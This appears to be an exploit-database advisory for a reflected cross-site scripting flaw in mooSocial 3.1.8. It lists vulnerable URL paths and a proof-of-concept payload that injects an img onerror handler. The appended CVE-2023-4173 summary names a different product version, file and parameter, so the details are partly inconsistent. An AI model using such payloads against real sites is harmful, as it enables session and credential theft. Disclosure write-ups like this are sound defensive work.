Headline
mooSocial 3.1.8 Cross Site Scripting
mooSocial version 3.1.8 suffers from a cross site scripting vulnerability.
# Exploit Title: mooSocial 3.1.8 - Reflected XSS# Exploit Author: CraCkEr# Date: 28/07/2023# Vendor: mooSocial# Vendor Homepage: https://moosocial.com/# Software Link: https://travel.moosocial.com/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4173## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsURL path folder is vulnerable to XSShttps://website/classifieds[XSS]/search?category=1https://website/classifieds/search[XSS]?category=1XSS Payloads:ijz3y"><img src=a onerror=alert(1)>y4apk[-] DoneRelated news
CVE-2023-4173
A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index. The manipulation of the argument q leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-236208.